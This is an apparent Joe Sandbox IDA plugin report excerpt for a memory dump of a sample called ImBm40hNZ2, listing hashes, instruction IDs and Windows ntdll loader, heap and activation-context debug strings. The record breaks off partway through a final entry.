                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                                                                                                • Opcode ID: 31c8555898318ce31cd34d4345c9522afa440908099bd88e00921e074d1fd3b6
                                                                                                                                                                                                                                                                • Instruction ID: 010d9c5c0f9e2683675c911e28f87f6c69628b3c172dc7f84866bfe04231d4b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31c8555898318ce31cd34d4345c9522afa440908099bd88e00921e074d1fd3b6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27C17A78508382CFE321CF68C540B5AB7E8FF85784F04496AF8958B691E778C949CF96
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • @, xrefs: 339384B1
                                                                                                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3393847E
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33938341
                                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 33938342
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                                                                                                                                                • Opcode ID: c7a2c9cc597f202d00b4e0b8810a412e0252cbde3ae23af22b93ed677fb1e780
                                                                                                                                                                                                                                                                • Instruction ID: e090026ece3a7e3fe88136f5b25978ab502fc7d94ea6c4890ac63b9eec2a673d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7a2c9cc597f202d00b4e0b8810a412e0252cbde3ae23af22b93ed677fb1e780
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7991ADB1909345EFE721CA60C844EABBBECFF85395F44086DFA84D6541E334C948CB62
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 33971FE8
                                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 339720C0
                                                                                                                                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 33971FE3, 339720BB
                                                                                                                                                                                                                                                                • .Local, xrefs: 339327F8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                                                                                                                                                • Opcode ID: 7b34b962950f4a936e7d633fc347d610735d2cfd4f42c9db2cc281dff7ad8f01
                                                                                                                                                                                                                                                                • Instruction ID: 84b07dd1a1a9f4bd1515786f4673b520181b713ce4dadf474f3fe58e7c8eb92f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b34b962950f4a936e7d633fc347d610735d2cfd4f42c9db2cc281dff7ad8f01
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22A190B5D02329DBDB20CF64D884B99B3B9FF59364F1441E9D888AB291D7309E85CF90
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33960E2F
                                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33960EB5
                                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33960E72
                                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33960DEC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                                                                                                                                                • Opcode ID: f294045b81b8315806f88567b9038dfd89a2cdf0ea6375d575b474808d499de4
                                                                                                                                                                                                                                                                • Instruction ID: 46aa41db766b72c63f9e14226a1cca7c61c25235850db069ffb7bccc2d4cc417
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f294045b81b8315806f88567b9038dfd89a2cdf0ea6375d575b474808d499de4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5571ADB1908304DFE760DF54C884B8B7BACEF857A4F4405A9F9888A647D735E588CF92
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                                                                                                                • API String ID: 0-2586055223
                                                                                                                                                                                                                                                                • Opcode ID: 835ee8c68381dc410894aba3842d9b108e9740607be532801303ec4a4c4d824c
                                                                                                                                                                                                                                                                • Instruction ID: ebb1f28731026a71ccc2c4743211d6c23ad11180b5a7ee44b37971b08d89a3ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 835ee8c68381dc410894aba3842d9b108e9740607be532801303ec4a4c4d824c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4612375A04384DFE312CBA4D844F57B7E8EF84B90F080559F9A48B6A2DB35E840CB66
Strings
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
• API String ID: 0-1391187441
APIs
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID:
• String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
• API String ID: 0-1168191160
Strings
• HEAP[%wZ]: , xrefs: 33901632
• HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33901648
• HEAP: , xrefs: 339014B6
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
• API String ID: 0-3178619729
Strings
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID:
• String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
• API String ID: 0-1145731471
Strings
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID:
• String ID: @$DelegatedNtdll$\SystemRoot\system32\
• API String ID: 0-2391371766
Strings
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                                                                                                                                • API String ID: 0-318774311
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                                                                                                • API String ID: 0-373624363
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • TargetNtPath, xrefs: 339DB3AF
                                                                                                                                                                                                                                                                • GlobalizationUserSettings, xrefs: 339DB3B4
                                                                                                                                                                                                                                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 339DB3AA
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                                                                                                • API String ID: 0-505981995
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 3395E435
                                                                                                                                                                                                                                                                • HEAP: , xrefs: 3395E442
                                                                                                                                                                                                                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3395E455
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                                                                                • API String ID: 0-1340214556
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 3396A396
                                                                                                                                                                                                                                                                • LdrpCompleteMapModule, xrefs: 3396A39D
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 3396A3A7
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                                                                                • API String ID: 0-1676968949
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 339AD792
                                                                                                                                                                                                                                                                • HEAP: , xrefs: 339AD79F
                                                                                                                                                                                                                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 339AD7B2
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                                                                                                • API String ID: 0-3815128232
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33971943
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 33971954
                                                                                                                                                                                                                                                                • LdrpAllocateTls, xrefs: 3397194A
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                                                                • API String ID: 0-4274184382
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • RtlCreateActivationContext, xrefs: 33972803
                                                                                                                                                                                                                                                                • Actx , xrefs: 339332CC
                                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context data, xrefs: 33972808
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                                                                                                • API String ID: 0-859632880
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3398B2B2
                                                                                                                                                                                                                                                                • @, xrefs: 3398B2F0
                                                                                                                                                                                                                                                                • GlobalFlag, xrefs: 3398B30F
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                                                                                • API String ID: 0-4192008846
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3394119B
                                                                                                                                                                                                                                                                • BuildLabEx, xrefs: 3394122F
                                                                                                                                                                                                                                                                • @, xrefs: 339411C5
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                • API String ID: 0-3051831665
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 339885DE
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                                                • API String ID: 0-702105204
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$@
                                                                                                                                                                                                                                                                • API String ID: 0-149943524
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: $$$
                                                                                                                                                                                                                                                                • API String ID: 3446177414-233714265
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 3390A229
                                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 3390A21B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                                                                                • API String ID: 0-118005554
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .Local\$@
                                                                                                                                                                                                                                                                • API String ID: 0-380025441
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • RtlpInitializeAssemblyStorageMap, xrefs: 3397289A
                                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3397289F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                                                                                                • API String ID: 0-2653619699
                                                                                                                                                                                                                                                                • Opcode ID: 807c275aa1c3316e7d2fb419b6240ea1e1abbc9923e0bf8f6bf44037125827cc
                                                                                                                                                                                                                                                                • Instruction ID: e89806f355d20c30da98c52ad5ab1f0e2668019513c02a68cd900f4eb76e800d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 807c275aa1c3316e7d2fb419b6240ea1e1abbc9923e0bf8f6bf44037125827cc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 831106B6F15304FBE7158B488C84F9A77ACDB897A0F188029B904EB285DA75CD0087A0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: MUI
                                                                                                                                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                                                                                                                                • Opcode ID: ba3cfe8079f6c6c1efbbbc7301d53fc47138f5b1947c15a20adec019314aa8b8
                                                                                                                                                                                                                                                                • Instruction ID: 29fc04757fdcd1ed774e9950768a08c62f4f7043e6a8239f9a297c28baa14b4e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba3cfe8079f6c6c1efbbbc7301d53fc47138f5b1947c15a20adec019314aa8b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2825B79E00319DFEB24CFA9C98079DB7B9BF48390F148169E859AB251DB309985CF50
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 80be7d6d963281ca7ae75cda9e206548f3b0396c027b1451b825e0a0e17f4dc4
                                                                                                                                                                                                                                                                • Instruction ID: 290729ada9ab28cf94a4f79bbb61a47cedfccd16a7cf280b7fc0a969acad4f1c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80be7d6d963281ca7ae75cda9e206548f3b0396c027b1451b825e0a0e17f4dc4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19A11771E01718DFFB21DB94C884B9D7BA8EF08BA8F090255E951FB295D7749D44CB80
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: 69b9abd97a3468590476aafac473ad8aceedf67b8f2f636ed5c41550ffb3c6f2
                                                                                                                                                                                                                                                                • Instruction ID: 8c9f5ce3eee4294bba691447fbf0f90da2365345afcad7ac4301cfb8e47cc065
